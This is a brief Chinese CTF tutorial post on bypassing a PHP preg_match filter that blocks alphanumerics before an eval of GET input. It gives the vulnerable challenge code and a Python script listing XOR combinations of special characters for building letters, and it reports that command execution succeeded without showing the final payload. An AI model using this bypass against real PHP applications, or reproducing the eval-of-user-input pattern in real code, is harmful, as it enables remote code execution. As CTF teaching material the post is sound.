ctf中 preg_match 绕过技术

匿名 (未验证) 提交于 2019-12-03 00:15:02

1,例题

<?php error_reporting(0); if(isset($_GET['code'])){         $code=$_GET['code'];             if(strlen($code)>40){                     die("This is too Long.");                     }             if(preg_match("/[A-Za-z0-9]+/",$code)){                     die("NO.");                     }             @eval($code); } else{         highlight_file(__FILE__); } highlight_file(__FILE);  // ?>

使用异或绕过:可以使用各种特殊字符的异或构造出字母和数字

str = r"~!@#$%^&*()_+<>?,.;:-[]{}\/"  for i in range(0, len(str)):     for j in range(0, len(str)):         a = ord(str[i])^ord(str[j])         print(str[i] + ' ^ ' + str[j] + ' is ' + chr(a))

成功触发命令命令执行:

标签
ctf
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!